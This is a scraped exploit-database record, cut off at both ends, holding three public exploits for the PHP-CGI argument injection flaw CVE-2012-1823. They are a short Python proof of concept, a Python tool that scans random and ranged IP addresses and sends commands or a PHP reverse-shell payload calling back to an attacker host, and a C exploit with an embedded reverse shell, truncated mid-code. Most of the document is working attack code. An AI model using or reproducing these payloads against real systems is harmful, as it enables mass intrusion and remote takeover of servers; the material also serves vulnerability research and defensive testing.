"2012-05-05T00:00:00", "type": "exploitdb", "title": "PHP CGI Argument Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2311", "CVE-2012-2336", "CVE-2012-1823"], "modified": "2012-05-05T00:00:00", "id": "EDB-ID:18836", "href": "https://www.exploit-db.com/exploits/18836/", "sourceData": "######################################################################################\r\n# Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit\r\n# Date: May 4, 2012\r\n# Author: rayh4c[0x40]80sec[0x2e]com\r\n# Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com\r\n######################################################################################\r\n\r\nimport socket\r\nimport sys\r\n\r\ndef cgi_exploit():\r\n pwn_code = \"\"\"<?php phpinfo();?>\"\"\" \r\n post_Length = len(pwn_code)\r\n http_raw=\"\"\"POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1\r\nHost: %s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %s\r\n\r\n%s\r\n\"\"\" %(HOST , post_Length ,pwn_code)\r\n print http_raw\r\n try:\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.connect((HOST, int(PORT)))\r\n sock.send(http_raw)\r\n data = sock.recv(10000)\r\n print repr(data)\r\n sock.close()\r\n except socket.error, msg:\r\n sys.stderr.write(\"[ERROR] %s\\n\" % msg[1])\r\n sys.exit(1)\r\n \r\nif __name__ == '__main__':\r\n try:\r\n HOST = sys.argv[1]\r\n PORT = sys.argv[2]\r\n cgi_exploit()\r\n except IndexError:\r\n print '[+]Usage: cgi_test.py site.com 80'\r\n sys.exit(-1)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18836/"}, {"lastseen": "2016-02-03T10:02:19", "description": "Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2). CVE-2012-1823,CVE-2012-2311,CVE-2012-2336. Remote exploit for php platform", "published": "2013-10-31T00:00:00", "type": "exploitdb", "title": "Apache + PHP 5.x - Remote Code Execution Multithreaded Scanner 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2311", "CVE-2012-2336", "CVE-2012-1823"], "modified": "2013-10-31T00:00:00", "id": "EDB-ID:29316", "href": "https://www.exploit-db.com/exploits/29316/", "sourceData": "#!/usr/bin/env python\r\n#\r\n# ap-unlock-v2.py - apache + php 5.* rem0te c0de execution 0day (better version)\r\n#\r\n# NOTE:\r\n# - quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE :(((\r\n# - for connect back shell start netcat/nc and bind port on given host:port\r\n# - is ip-range scanner not is multithreaded, but iz multithreaded iz in\r\n# random scanner and is scanner from file (greets to MustLive)\r\n# - no ssl support\r\n# - more php paths can be added\r\n# - adjust this shit for windows b0xes\r\n#\r\n# 2013\r\n# by noptrix - http://nullsecurity.net/\r\n\r\nimport sys\r\nimport socket\r\nimport argparse\r\nimport threading\r\nimport time\r\nimport random\r\nimport select\r\n\r\n\r\nNONE = 0\r\nVULN = 1\r\nSCMD = 2\r\nXPLT = 3\r\n\r\nt3st = 'POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D' \\\r\n '%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73' \\\r\n '%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+' \\\r\n '%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+'\\\r\n '%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1\\r\\nHost:localhost\\r\\n'\\\r\n 'Content-Type: text/html\\r\\nContent-Length:1\\r\\n\\r\\na\\r\\n'\r\n\r\n\r\ndef m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt):\r\n c0nn_b4ck = \\\r\n '''\r\n <? set_time_limit (0); $VERSION = \"1.0\"; $ip = \"''' + cb_h0st + '''\";\r\n $port = ''' + cb_p0rt + '''; $chunk_size = 1400; $write_a = null;\r\n $error_a = null; $shell = \"unset HISTFILE; id; /bin/sh -i\"; $daemon = 0;\r\n $debug = 0; if (function_exists(\"pcntl_fork\")) {$pid = pcntl_fork();\r\n if ($pid == -1) {exit(1);}if ($pid) {exit(0);}if (posix_setsid() == -1) {\r\n exit(1);}$daemon = 1;} else {print \"bla\";}chdir(\"/\");umask(0);\r\n $sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {\r\n printit(\"$errstr ($errno)\");exit(1);}$descriptorspec = array(\r\n 0 => array(\"pipe\", \"r\"), 1 => array(\"pipe\", \"w\"),2 => array(\"pipe\", \"w\"));\r\n $process = proc_open($shell, $descriptorspec, $pipes);\r\n if (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[1], 0);\r\n stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);\r\n printit(\"Successfully opened reverse shell to $ip:$port\");while (1) {\r\n if (feof($sock)) {printit(\"ERROR: Shell connection terminated\");break;}\r\n if (feof($pipes[1])) {printit(\"ERROR: Shell process terminated\");break;}\r\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\r\n $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\r\n if (in_array($sock, $read_a)) {if ($debug) printit(\"SOCK READ\");\r\n\t$input = fread($sock, $chunk_size);if ($debug) printit(\"SOCK: $input\");\r\n fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {\r\n if ($debug) printit(\"STDOUT READ\");$input = fread($pipes[1], $chunk_size);\r\n\tif ($debug) printit(\"STDOUT: $input\");fwrite($sock, $input);}\r\n\tif (in_array($pipes[2], $read_a)) {if ($debug) printit(\"STDERR READ\");\r\n $input = fread($pipes[2], $chunk_size);\r\n if ($debug) printit(\"STDERR: $input\");fwrite($sock, $input);}}fclose($sock);\r\n fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);\r\n function printit ($string) {if (!$daemon) {print \"$string\\n\";}}?>\r\n '''\r\n return c0nn_b4ck\r\n\r\n\r\ndef enc0dez():\r\n n33dz1 = ('cgi-bin', 'php')\r\n n33dz2 = ('-d', 'allow_url_include=on', '-d', 'safe_mode=off', '-d',\r\n 'suhosin.simulation=on', '-d', 'disable_functions=\"\"', '-d',\r\n 'open_basedir=none', '-d', 'auto_prepend_file=php://input',\r\n '-d', 'cgi.force_redirect=0', '-d', 'cgi.redirect_status_env=0',\r\n '-d', 'auto_prepend_file=php://input', '-n')\r\n fl4g = 0\r\n arg5 = ''\r\n p4th = ''\r\n plus = ''\r\n \r\n for x in n33dz2:\r\n if fl4g == 1:\r\n plus = '+'\r\n arg5 = arg5 + plus + \\\r\n ''.join('%' + c.encode('utf-8').encode('hex') for c in x)\r\n fl4g = 1\r\n for x in n33dz1:\r\n p4th = p4th + '/' + \\\r\n ''.join('%' + c.encode('utf-8').encode('hex') for c in x)\r\n return (p4th.upper(), arg5.upper())\r\n\r\n\r\ndef m4k3_p4yl0rd(p4yl0rd, m0de):\r\n p4th, arg5 = enc0dez()\r\n if m0de == VULN:\r\n p4yl0rd = t3st\r\n elif m0de == SCMD or m0de == XPLT:\r\n p4yl0rd = 'POST /' + p4th + '?' + arg5 + ' HTTP/1.1\\r\\n' \\\r\n 'Host: ' + sys.argv[1] + '\\r\\n' \\\r\n 'Content-Type: application/x-www-form-urlencoded\\r\\n' \\\r\n 'Content-Length: ' + str(len(p4yl0rd)) + '\\r\\n\\r\\n' + p4yl0rd\r\n return p4yl0rd\r\n\r\n\r\ndef s3nd_sh1t(args, m0de, c0nn_b4ck):\r\n pat = '<b>Parse error</b>:'\r\n try:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.settimeout(float(args.t))\r\n res = s.connect_ex((args.h, int(args.p)))\r\n if res == 0:\r\n if m0de == VULN:\r\n p4yl0rd = m4k3_p4yl0rd('', m0de)\r\n s.sendall(p4yl0rd)\r\n if pat in s.recv(4096):\r\n print \"--> \" + args.h + \" vu1n\"\r\n return args.h\r\n else:\r\n if args.v:\r\n print \"--> %s n0t vu1n\" % (args.h)\r\n return\r\n elif m0de == SCMD:\r\n p4yl0rd = m4k3_p4yl0rd('<? system(\"' + args.c + '\"); ?>', m0de)\r\n s.sendall(p4yl0rd)\r\n rd, wd, ex = select.select([s], [], [], float(args.t))\r\n if rd:\r\n for line in s.makefile():\r\n print line,\r\n elif m0de == XPLT:\r\n p4yl0rd = m4k3_p4yl0rd(c0nn_b4ck, m0de)\r\n s.sendall(p4yl0rd)\r\n else:\r\n if args.v:\r\n print \"--> n0 w3bs3rv3r 0n %s\" % (args.h)\r\n except socket.error:\r\n return\r\n return\r\n\r\n\r\ndef m4k3_r4nd_1p4ddr(num):\r\n h0sts = []\r\n for x in range(int(num)):\r\n h0sts.append('%d.%d.%d.%d' % (random.randrange(0,255),\r\n random.randrange(0,255), random.randrange(0,255),\r\n random.randrange(0,255)))\r\n return h0sts\r\n\r\n\r\ndef sc4n_r4nd0m(args, h0st, m0de, vu1nz):\r\n args.h = h0st\r\n vu1nz.append(s3nd_sh1t(args, m0de, None))\r\n vu1nz = filter(None, vu1nz)\r\n return\r\n\r\n\r\ndef sc4n_fr0m_f1le(args, h0st, m0de, vu1nz):\r\n args.h = h0st.rstrip()\r\n vu1nz.append(s3nd_sh1t(args, m0de, None))\r\n vu1nz = filter(None, vu1nz)\r\n return\r\n\r\n\r\ndef sc4n_r4ng3(rsa, rsb, args, m0de):\r\n vu1nz = []\r\n for i in range (rsa[0], rsb[0]):\r\n for j in range (rsa[1], rsb[1]):\r\n for k in range (rsa[2], rsb[2]):\r\n for l in range(rsa[3], rsb[3]):\r\n args.h = str(i) + \".\" + str(j) + \".\" + str(k) + \".\" + str(l)\r\n vu1nz.append(s3nd_sh1t(args, m0de, None))\r\n time.sleep(0.005)\r\n vu1nz = filter(None, vu1nz)\r\n return vu1nz\r\n\r\n\r\ndef m4k3_ipv4_r4ng3(iprange):\r\n a = tuple(part for part in iprange.split('.'))\r\n rsa = (range(4))\r\n rsb = (range(4))\r\n for i in range(0,4):\r\n ga = a[i].find('-')\r\n if ga != -1:\r\n rsa[i] = int(a[i][:ga])\r\n rsb[i] = int(a[i][1+ga:]) + 1 \r\n else:\r\n rsa[i] = int(a[i])\r\n rsb[i] = int(a[i]) + 1\r\n return (rsa, rsb)\r\n\r\n\r\ndef parse_args():\r\n p = argparse.ArgumentParser(\r\n usage='\\n\\n ./ap-unlock-v2.py -h <4rg> -s | -c <4rg> | -x <4rg> [0pt1ons]'\\\r\n '\\n ./ap-unlock-v2.py -r <4rg> | -R <4rg> | -i <4rg> [0pt1ons]',\r\n formatter_class=argparse.RawDescriptionHelpFormatter, add_help=False)\r\n opts = p.add_argument_group('0pt1ons', '')\r\n opts.add_argument('-h', metavar='wh1t3h4tz.0rg',\r\n help='| t3st s1ngle h0st f0r vu1n')\r\n opts.add_argument('-p', default=80, metavar='80',\r\n help='| t4rg3t p0rt (d3fau1t: 80)')\r\n opts.add_argument('-c', metavar='\\'uname -a;id\\'',\r\n help='| s3nd c0mm4nds t0 h0st')\r\n opts.add_argument('-x', metavar='192.168.0.2:1337',\r\n help='| c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll')\r\n opts.add_argument('-s', action='store_true',\r\n help='| t3st s1ngl3 h0st f0r vu1n')\r\n opts.add_argument('-r', metavar='133.1.3-7.7-37',\r\n help='| sc4nz iP addr3ss r4ng3 f0r vu1n')\r\n opts.add_argument('-R', metavar='1337',\r\n help='| sc4nz num r4nd0m h0st5 f0r vu1n')\r\n opts.add_argument('-t', default=3, metavar='3',\r\n help='| t1me0ut in s3x (d3fau1t: 3)')\r\n opts.add_argument('-f', metavar='vu1n.lst',\r\n help='| wr1t3 vu1n h0sts t0 f1l3')\r\n opts.add_argument('-i', metavar='sc4nz.lst',\r\n help='| sc4nz h0sts fr0m f1le f0r vu1n')\r\n opts.add_argument('-S', metavar='2',\r\n help='| sl33pz in s3x b3tw33n thr3adz (d3fault: 2)')\r\n opts.add_argument('-T', default=2, metavar='4',\r\n help='| nuM sc4n thr3adz (d3fault: 4)')\r\n opts.add_argument('-v', action='store_true',\r\n help='| pr1nt m0ah 1nf0z wh1l3 sh1tt1ng')\r\n args = p.parse_args()\r\n if not args.h and not args.r and not args.R and not args.i:\r\n p.print_help()\r\n sys.exit(0)\r\n return args\r\n\r\n\r\ndef wr1te_fil3(args, vu1nz):\r\n if args.f:\r\n if vu1nz:\r\n try:\r\n f = open(args.f, \"w\")\r\n f.write(\"\\n\".join(vu1nz)+\"\\n\")\r\n f.close()\r\n except:\r\n sys.stderr.write('de1n3 mudd1 k0cht guT')\r\n sys.stderr.write('\\n')\r\n raise SystemExit()\r\n return\r\n\r\n\r\ndef c0ntr0ller():\r\n vu1nz = []\r\n m0de = NONE\r\n try:\r\n args = parse_args()\r\n if not args.t:\r\n args.t = float(3)\r\n if args.h:\r\n if args.s:\r\n print \"[+] sc4nn1ng s1ngl3 h0st %s \" % (args.h)\r\n m0de = VULN\r\n s3nd_sh1t(args, m0de, None)\r\n elif args.c:\r\n print \"[+] s3nd1ng c0mm4ndz t0 h0st %s \" % (args.h)\r\n m0de = SCMD\r\n s3nd_sh1t(args, m0de, None)\r\n elif args.x:\r\n print \"[+] xpl0it1ng b0x %s \" % (args.h)\r\n m0de = XPLT\r\n if args.x.find(':') != -1:\r\n if not args.x.split(':')[1]:\r\n print \"[-] 3rr0r: p0rt m1ss1ng\"\r\n else:\r\n cb_h0st = args.x.split(':')[0]\r\n cb_p0rt = args.x.split(':')[1]\r\n else:\r\n print \"[-] 3rr0r: <h0st>:<p0rt> y0u l4m3r\"\r\n c0nn_b4ck = m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt)\r\n s3nd_sh1t(args, m0de, c0nn_b4ck)\r\n else:\r\n print \"[-] 3rr0r: m1ss1ng -s, -c 0r -x b1tch\"\r\n sys.exit(-1)\r\n if args.r:\r\n print \"[+] sc4nn1ng r4ng3 %s \" % (args.r)\r\n m0de = VULN\r\n rsa, rsb = m4k3_ipv4_r4ng3(args.r)\r\n vu1nz = sc4n_r4ng3(rsa, rsb, args, m0de)\r\n if args.R:\r\n print \"[+] sc4nn1ng %d r4nd0m b0xes\" % (int(args.R))\r\n m0de = VULN\r\n if not args.S:\r\n args.S = float(2)\r\n h0sts = m4k3_r4nd_1p4ddr(int(args.R))\r\n for h0st in h0sts:\r\n try:\r\n t = threading.Thread(target=sc4n_r4nd0m, args=(args, h0st,\r\n m0de, vu1nz))\r\n t.start()\r\n time.sleep(float(args.S))\r\n while threading.activeCount() > int(args.T):\r\n time.sleep(2)\r\n except:\r\n sys.stdout.flush()\r\n sys.stdout.write(\"\\b\\b[!] w4rn1ng: ab0rt3d bY us3r\\n\")\r\n raise SystemExit\r\n if args.i:\r\n print \"[+] sc4nn1ng b0xes fr0m f1le %s\" % (args.i)\r\n m0de = VULN\r\n h0sts = tuple(open(args.i, 'r'))\r\n if not args.S:\r\n args.S = float(2)\r\n for h0st in h0sts:\r\n try:\r\n t = threading.Thread(target=sc4n_fr0m_f1le, args=(args,\r\n h0st, m0de, vu1nz))\r\n t.start()\r\n time.sleep(float(args.S))\r\n while threading.activeCount() > int(args.T):\r\n time.sleep(2)\r\n except KeyboardInterrupt:\r\n sys.stdout.flush()\r\n sys.stdout.write(\"\\b\\b[!] w4rn1ng: ab0rt3d bY us3r\\n\")\r\n raise SystemExit\r\n #sc4n_fr0m_f1le(args, h0sts, m0de, vu1nz)\r\n except KeyboardInterrupt:\r\n sys.stdout.flush()\r\n sys.stderr.write(\"\\b\\b[!] w4rn1ng: ab0rt3d bY us3r\\n\")\r\n raise SystemExit\r\n wr1te_fil3(args, vu1nz)\r\n\r\n return\r\n\r\n\r\ndef m41n():\r\n if __name__ == \"__main__\":\r\n print \"--==[ ap-unlock-v2.py by noptrix@nullsecurity.net ]==--\"\r\n c0ntr0ller()\r\n else:\r\n print \"[-] 3rr0r: y0u fuck3d up dud3\"\r\n sys.exit(1)\r\n print \"[+] h0p3 1t h3lp3d\"\r\n\r\n\r\n# \\o/ fr33 requiem 1337 h4x0rs ... \r\nm41n()\r\n\r\n# e0F", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29316/"}, {"lastseen": "2016-02-03T09:58:57", "description": "Apache / PHP 5.x - cgi-bin Remote Code Execution Exploit. CVE-2012-1823,CVE-2012-2311,CVE-2012-2336. Remote exploit for linux platform", "published": "2013-10-29T00:00:00", "type": "exploitdb", "title": "Apache / PHP 5.x - cgi-bin Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2311", "CVE-2012-2336", "CVE-2012-1823"], "modified": "2013-10-29T00:00:00", "id": "EDB-ID:29290", "href": "https://www.exploit-db.com/exploits/29290/", "sourceData": "/* Apache Magica by Kingcope */\r\n/* gcc apache-magika.c -o apache-magika -lssl */\r\n/* This is a code execution bug in the combination of Apache and PHP.\r\nOn Debian and Ubuntu the vulnerability is present in the default install\r\nof the php5-cgi package. When the php5-cgi package is installed on Debian and\r\nUbuntu or php-cgi is installed manually the php-cgi binary is accessible under\r\n/cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute\r\nthe binary because this binary has a security check enabled when installed with\r\nApache http server and this security check is circumvented by the exploit.\r\nWhen accessing the php-cgi binary the security check will block the request and\r\nwill not execute the binary.\r\nIn the source code file sapi/cgi/cgi_main.c of PHP we can see that the security\r\ncheck is done when the php.ini configuration setting cgi.force_redirect is set\r\nand the php.ini configuration setting cgi.redirect_status_env is set to no.\r\nThis makes it possible to execute the binary bypassing the Security check by\r\nsetting these two php.ini settings.\r\nPrior to this code for the Security check getopt is called and it is possible\r\nto set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the\r\n-d switch. If both values are set to zero and the request is sent to the server\r\nphp-cgi gets fully executed and we can use the payload in the POST data field\r\nto execute arbitrary php and therefore we can execute programs on the system.\r\napache-magika.c is an exploit that does exactly the prior described. It does\r\nsupport SSL.\r\n/* Affected and tested versions\r\nPHP 5.3.10\r\nPHP 5.3.8-1\r\nPHP 5.3.6-13\r\nPHP 5.3.3\r\nPHP 5.2.17\r\nPHP 5.2.11\r\nPHP 5.2.6-3\r\nPHP 5.2.6+lenny16 with Suhosin-Patch\r\nAffected versions\r\nPHP prior to 5.3.12\r\nPHP prior to 5.4.2\r\nUnaffected versions\r\nPHP 4 - getopt parser unexploitable\r\nPHP 5.3.12 and up\r\nPHP 5.4.2 and up\r\nUnaffected versions are patched by CVE-2012-1823.\r\n*/\r\n/* .\r\n /'\\rrq rk\r\n . // \\\\ .\r\n.x.//fco\\\\-|-\r\n '//cmtco\\\\zt\r\n //6meqrg.\\\\tq\r\n//_________\\\\'\r\nEJPGQO\r\napache-magica.c by Kingcope\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <sys/types.h>\r\n#include <stddef.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n\r\ntypedef struct {\r\n\tint sockfd;\r\n\tSSL *handle;\r\n\tSSL_CTX *ctx;\r\n} connection;\r\n\r\nvoid usage(char *argv[])\r\n{\r\n printf(\"usage: %s <--target target> <--port port> <--protocol http|https> \" \\\r\n \"<--reverse-ip ip> <--reverse-port port> [--force-interpreter interpreter]\\n\",\r\n argv[0]);\r\n exit(1);\r\n}\r\n\r\nchar poststr[] = \"POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F\" \\\r\n \"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64\" \\\r\n \"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73\" \\\r\n \"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E\" \\\r\n \"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63\" \\\r\n \"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62\" \\\r\n \"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74\" \\\r\n \"%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68\" \\\r\n \"%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F\" \\\r\n \"%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63\" \\\r\n \"%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73\" \\\r\n \"%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\\r\\n\" \\\r\n \"Host: %s\\r\\n\" \\\r\n \"User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26\" \\\r\n \"(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\\r\\n\" \\\r\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \\\r\n \"Content-Length: %d\\r\\n\" \\\r\n \"Connection: close\\r\\n\\r\\n%s\";\r\nchar phpstr[] = \"<?php\\n\" \\\r\n\"set_time_limit(0);\\n\" \\\r\n\"$ip = '%s';\\n\" \\\r\n\"$port = %d;\\n\" \\\r\n\"$chunk_size = 1400;\\n\" \\\r\n\"$write_a = null;\\n\" \\\r\n\"$error_a = null;\\n\" \\\r\n\"$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';\\n\" \\\r\n\"$daemon = 0;\\n\" \\\r\n\"$debug = 0;\\n\" \\\r\n\"if (function_exists('pcntl_fork')) {\\n\" \\\r\n\"\t$pid = pcntl_fork();\t\\n\" \\\r\n\"\tif ($pid == -1) {\\n\" \\\r\n\"\t\tprintit(\\\"ERROR: Can't fork\\\");\\n\" \\\r\n\"\t\texit(1);\\n\" \\\r\n\"\t}\\n\" \\\r\n\"\tif ($pid) {\\n\" \\\r\n\"\t\texit(0);\\n\" \\\r\n\"\t}\\n\" \\\r\n\"\tif (posix_setsid() == -1) {\\n\" \\\r\n\"\t\tprintit(\\\"Error: Can't setsid()\\\");\\n\" \\\r\n\"\t\texit(1);\\n\" \\\r\n\"\t}\\n\" \\\r\n\"\t$daemon = 1;\\n\" \\\r\n\"} else {\\n\" \\\r\n\"\tprintit(\\\"WARNING: Failed to daemonise.\\\");\\n\" \\\r\n\"}\\n\" \\\r\n\"chdir(\\\"/\\\");\\n\" \\\r\n\"umask(0);\\n\" \\\r\n\"$sock = fsockopen($ip, $port, $errno, $errstr, 30);\\n\" \\\r\n\"if (!$sock) {\\n\" \\\r\n\"\tprintit(\\\"$errstr ($errno)\\\");\\n\" \\\r\n\"\texit(1);\\n\" \\\r\n\"}\\n\" \\\r\n\"$descriptorspec = array(\\n\" \\\r\n\" 0 => array(\\\"pipe\\\", \\\"r\\\"),\\n\" \\\r\n\" 1 => array(\\\"pipe\\\", \\\"w\\\"),\\n\" \\\r\n\" 2 => array(\\\"pipe\\\", \\\"w\\\")\\n\" \\\r\n\");\\n\" \\\r\n\"$process = proc_open($shell, $descriptorspec, $pipes);\\n\" \\\r\n\"if (!is_resource($process)) {\\n\" \\\r\n\"\tprintit(\\\"ERROR: Can't spawn shell\\\");\\n\" \\\r\n\"\texit(1);\\n\" \\\r\n\"}\\n\" \\\r\n\"stream_set_blocking($pipes[0], 0);\\n\" \\\r\n\"stream_set_blocking($pipes[1], 0);\\n\" \\\r\n\"stream_set_blocking($pipes[2], 0);\\n\" \\\r\n\"stream_set_blocking($sock, 0);\\n\" \\\r\n\"while (1) {\\n\" \\\r\n\"\tif (feof($sock)) {\\n\" \\\r\n\"\t\tprintit(\\\"ERROR: Shell connection terminated\\\");\\n\" \\\r\n\"\t\tbreak;\\n\" \\\r\n\"\t}\\n\" \\\r\n\"\tif (feof($pipes[1])) {\\n\" \\\r\n\"\t\tprintit(\\\"ERROR: Shell process terminated\\\");\\n\" \\\r\n\"\t\tbreak;\\n\" \\\r\n\"\t}\\n\" \\\r\n\"\t$read_a = array($sock, $pipes[1], $pipes[2]);\\n\" \\\r\n\"\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\\n\" \\\r\n\"\tif (in_array($sock, $read_a)) {\\n\" \\\r\n\"\t\tif ($debug) printit(\\\"SOCK READ\\\");\\n\" \\\r\n\"\t\t$input = fread($sock, $chunk_size);\\n\" \\\r\n\"\t\tif ($debug) printit(\\\"SOCK: $input\\\");\\n\" \\\r\n\"\t\tfwrite($pipes[0], $input);\\n\" \\\r\n\"\t}\\n\" \\\r\n\"\tif (in_array($pipes[1], $read_a)) {\\n\" \\\r\n\"\t\tif ($debug) printit(\\\"STDOUT READ\\\");\\n\" \\\r\n\"\t\t$input = fread($pipes[1], $chunk_size);\\n\" \\\r\n\"\t\tif ($debug) printit(\\\"STDOUT: $input\\\");\\n\" \\\r\n\"\t\tfwrite($sock, $input);\\n\" \\\r\n\"\t}\\n\" \\\r\n\"\tif (in_array($pipes[2], $read_a)) {\\n\" \\\r\n\"\t\tif ($debug) printit(\\\"STDERR READ\\\");\\n\" \\\r\n\"\t\t$input = fread($pipes[2], $chunk_size);\\n\" \\\r\n\"\t\tif ($debug) printit(\\\"STDERR: $input\\\");\\n\" \\\r\n\"\t\tfwrite($sock, $input);\\n\" \\\r\n\"\t}\\n\" \\\r\n\"}\\n\" \\\r\n\"\\n\" \\\r\n\"fclose($sock);\\n\" \\\r\n\"fclose($pipes[0]);\\n\" \\\r\n\"fclose($pipes[1]);\\n\" \\\r\n\"fclose($pipes[2]);\\n\" \\\r\n\"proc_close($process);\\n\" \\\r\n\"function printit ($string) {\\n\" \\\r\n\"\tif (!$daemon) {\\n\" \\\r\n\"\t\tprint \\\"$string\\n\\\";\\n\" \\\r\n\"\t}\\n\" \\\r\n\"}\\n\" \\\r\n\"exit(1);\\n\" \\\r\n\"?>\";\r\n\r\nstruct sockaddr_in *gethostbyname_(char *hostname, unsigned short port)\r\n{\r\n struct hostent *he;\r\n struct sockaddr_in server, *servercopy;\r\n \r\n if ((he=gethostbyname(hostname)) == NULL) {\r\n printf(\"Hostname cannot be resolved\\n\");\r\n exit(255);\r\n }\r\n \r\n servercopy = malloc(sizeof(struct sockaddr_in));\r\n if (!servercopy) {\r\n\tprintf(\"malloc error (1)\\n\");\r\n\texit(255);\r\n }\r\n memset(&server, '\\0', sizeof(struct sockaddr_in));\r\n memcpy(&server.sin_addr, he->h_addr_list[0], he->h_length);\r\n server.sin_family = AF_INET;\r\n server.sin_port = htons(port);\r\n memcpy(servercopy, &server, sizeof(struct sockaddr_in));\r\n return servercopy;\r\n}\r\n\r\nchar *sslread(connection *c)\r\n{\r\n char *rc = NULL;\r\n int received, count = 0, count2=0;\r\n char ch;\r\n\r\n for(;;)\r\n {\r\n if (!rc)\r\n rc = calloc(1024, sizeof (char) + 1);\r\n else\r\n if (count2 % 1024 == 0) {\r\n rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);\r\n }\r\n received = SSL_read(c->handle, &ch, 1);\r\n if (received == 1) {\r\n rc[count++] = ch;\r\n count2++;\r\n if (count2 > 1024*5)\r\n\t break;\r\n }\r\n else\r\n break;\r\n }\r\n return rc;\r\n}\r\n\r\nchar *read_(int sockfd)\r\n{\r\n char *rc = NULL;\r\n int received, count = 0, count2=0;\r\n char ch;\r\n\r\n for(;;)\r\n {\r\n if (!rc)\r\n rc = calloc(1024, sizeof (char) + 1);\r\n else\r\n if (count2 % 1024 == 0) {\r\n rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);\r\n }\r\n received = read(sockfd, &ch, 1);\r\n if (received == 1) {\r\n rc[count++] = ch;\r\n count2++;\r\n if (count2 > 1024*5)\r\n\t break;\r\n }\r\n else\r\n break;\r\n }\r\n return rc;\r\n}\r\n\r\nvoid main(int argc, char *argv[])\r\n{\r\n char *target, *protocol, *targetip, *writestr, *tmpstr, *readbuf=NULL,\r\n *interpreter, *reverseip, *reverseportstr, *forceinterpreter=NULL;\r\n char httpsflag=0;\r\n unsigned short port=0, reverseport=0;\r\n struct sockaddr_in *server;\r\n int sockfd;\r\n unsigned int writesize, tmpsize;\r\n unsigned int i;\r\n connection *sslconnection;\r\n printf(\"-== Apache Magika by Kingcope ==-\\n\");\r\n for(;;)\r\n {\r\n\t int c;\r\n int option_index=0;\r\n static struct option long_options[] = {\r\n\t {\"target\", required_argument, 0, 0 },\r\n\t {\"port\", required_argument, 0, 0 },\r\n\t {\"protocol\", required_argument, 0, 0 },\r\n\t {\"reverse-ip\", required_argument, 0, 0 },\r\n\t {\"reverse-port\", required_argument, 0, 0 },\r\n\t {\"force-interpreter\", required_argument, 0, 0 },\t \r\n\t {0, 0, 0, 0 }\r\n\t };\r\n\t \r\n\t c = getopt_long(argc, argv, \"\", long_options, &option_index);\r\n if (c < 0)\r\n \tbreak;\r\n \r\n switch (c) {\r\n\t case 0:\r\n\t switch (option_index) 